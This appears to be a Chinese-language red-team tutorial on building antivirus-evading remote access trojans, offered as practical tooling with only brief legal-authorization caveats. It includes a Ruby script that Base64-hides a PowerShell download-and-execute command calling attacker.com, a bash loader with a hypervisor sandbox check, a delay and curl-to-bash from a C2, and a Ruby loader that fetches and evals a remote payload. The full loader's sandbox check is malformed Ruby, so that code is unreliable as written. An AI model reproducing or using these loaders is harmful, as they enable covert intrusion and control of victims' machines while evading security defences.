一、动静结合:远控木马免杀的核心思路
在渗透测试或红队任务中,远控木马(RAT)成为攻击者的重要工具,能够持续控制目标主机。但随着安全防护技术的不断升级,传统的恶意载荷已经难以逃过EDR(终端检测响应)和杀毒软件的检测。在这种背景下,如何让远控木马实现免杀 变得至关重要。
免杀的核心问题在于对静态查杀和动态行为检测的对抗。杀毒软件通过特征码、文件哈希值、代码签名等方式检测静态文件,通过行为分析、沙箱监控来防御动态执行行为。因此,远控木马免杀的技术核心就是动态与静态结合,绕过文件和行为的双重检测。
我们需要回答以下几个核心问题:
- 如何规避静态检测(如签名匹配)?
- 如何绕过动态行为监控(如API调用记录、内存行为分析)?
- 如何利用多层加密与混淆提升免杀效果?
这篇文章将从免杀的技术原理讲起,结合实战中的载荷构造与免杀细节,展示如何通过Ruby和Shell代码实现一个免杀级的RAT。
---
二、分解目标:静态检测是如何被绕过的?
静态检测依赖于文件特征的识别,包括但不限于以下方面:
- 特征字符串匹配:如恶意命令、硬编码的C2地址、明显的Payload片段;
- 特定壳特征:某些PE加壳工具(如UPX)会被直接标记;
- 高风险API调用:如WinExec、ShellExecute等直接调用标记为可疑;
- 文件结构异常:如某些恶意载荷生成工具会导致文件整体结构与正常软件不符。
因此,一个有效的免杀策略可以从以下几方面入手:
- 加密与混淆:对文件中的敏感特征进行加密,减少被特征码匹配的可能性;
- 代码分离:将核心恶意代码从静态文件中分离出来,在运行时动态下载或解密执行;
- 正常化结构:确保生成的文件符合PE规范,避免结构异常。
下面,我们以一个Ruby脚本生成的恶意载荷为例,展示如何通过加密与代码分离实现静态免杀。
Ruby代码示例:构造免杀载荷
以下脚本会生成一个Base64加密的Payload,并将解密逻辑嵌入到最终的可执行文件中:
<pre><code class="language-ruby">require 'base64'
定义一个恶意的Payload(示例为简单的反向Shell命令)
malicious_command = "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
对Payload进行Base64加密
encoded_payload = Base64.strict_encode64(malicious_command)
构造一个解码并执行Payload的脚本
template = <<~RUBY require 'base64'
解码恶意Payload
payload = Base64.decode64('#{encoded_payload}')
使用系统命令执行Payload
system(payload) RUBY
将最终脚本写入文件
File.open("payload.rb", "w") do |file| file.write(template) end
puts "[+] Payload written to payload.rb"</code></pre>
分析
- Base64加密:将恶意命令加密存储,杀软无法直接匹配字符串特征。
- 动态解密执行:Payload在运行时解密并通过
system调用执行,进一步绕过静态扫描。 - Ruby语言优势:Ruby脚本本身较少被用于恶意目的,因此杀软中针对Ruby的规则较少。
我们生成的payload.rb虽然能够绕过大部分静态检测,但单独运行此脚本仍然可能被某些杀软的动态行为分析拦截。因此,接下来我们需要进一步讨论动态行为检测的对抗技巧。
---
三、动态检测对抗:伪装与延迟执行
动态检测的核心是监控文件在运行时的行为。恶意程序常见的行为包括:
- 网络通信:与C2服务器建立连接;
- 内存注入:将恶意代码注入到合法进程中;
- 敏感API调用:如
VirtualAlloc、CreateRemoteThread等。
为了对抗动态检测,我们可以采用以下策略:
- 伪装为合法行为:例如,将恶意流量伪装成正常的HTTPS请求;
- 延迟执行核心Payload:通过延迟、定时器等方式,让恶意行为避开沙箱的短期分析;
- 环境检查与反沙箱:检测是否运行在虚拟机或沙箱环境中,并在可疑环境中不执行核心代码。
以下是通过Shell脚本实现的一个伪装与延迟执行的示例:
Shell代码示例:延迟执行与伪装C2流量
<pre><code class="language-bash">#!/bin/bash
检测是否运行在虚拟机环境中(简单环境检查)
if grep -q "hypervisor" /proc/cpuinfo; then echo "[!] Possible sandbox detected. Exiting..." exit 1 fi
延迟执行(伪装成正常脚本)
sleep 30
模拟https流量
C2="https://legit-website.com" PAYLOAD=$(curl -s "$C2/malicious_payload")
执行Payload
bash -c "$PAYLOAD"</code></pre>
分析
- 环境检查:通过
/proc/cpuinfo查看是否运行在虚拟机中,检测沙箱环境。 - 延迟执行:通过
sleep延迟30秒,绕过沙箱短期分析。 - C2伪装:使用合法的HTTPS流量拉取恶意Payload,避免被流量检测标记。
通过这些动态对抗的技巧,我们可以进一步提升免杀能力。
---
四、实战演练:完整免杀远控木马的构造
在本节中,我们将结合前面讨论的静态免杀与动态对抗策略,构造一个免杀级的远控木马,并展示其工作流程。
目标是实现以下功能:
- 将恶意代码动态加载到内存中执行;
- 隐藏C2通信,避免流量被检测;
- 免杀处理,确保文件不被查杀。
以下是完整代码实现:
<pre><code class="language-ruby">require 'base64' require 'net/http'
C2服务器地址
C2_URL = "https://legit-website.com/malicious_payload"
环境检查
def sandbox_detected?
检测虚拟机相关关键字
return true if grep hypervisor /proc/cpuinfo != "" false end
主函数
def main if sandbox_detected? puts "[!] Sandbox detected. Exiting..." return end
延迟执行
sleep 30
从C2拉取加密Payload
uri = URI(C2_URL) encrypted_payload = Net::HTTP.get(uri)
解密Payload
payload = Base64.decode64(encrypted_payload)
动态执行Payload
eval(payload) end
main</code></pre>
分析
- 动态加载:恶意代码完全从C2加载,无敏感内容存储在本地。
- 加密通信:C2返回的Payload通过Base64加密,流量检测中难以发现。
- 环境检查与延迟:规避沙箱分析,提升生存能力。
---
五、免杀技术的局限与应对策略
尽管以上方法能够绕过大部分杀软的检测,但防御者也在不断进步。一些进阶检测技术(如行为链分析、AI模型)可能仍然发现异常。因此,我们需要持续优化免杀技术,包括:
- 多层混淆与壳技术:进一步增加对逆向的难度;
- 多态性生成:生成每次都不同的恶意文件;
- 流量伪装与加密:伪装成常见服务(如浏览器、邮件客户端)的流量。
此外,在合法授权的渗透中,建议尽量减少对目标的破坏,避免引起不必要的风险。
---
六、红队经验分享:免杀不等于无敌
免杀技术在实战中非常重要,但需牢记:
- 合法授权是前提:切勿将技术用于非法用途;
- 免杀不是万能:即便绕过了杀软,异常行为仍可能引起管理员注意;
- 不断更新技术:面对不断进化的防御手段,需要持续学习新方法。
最后,免杀是一门艺术,也是对攻防智慧的综合考验。希望这篇文章能为你提供实用的思路与工具。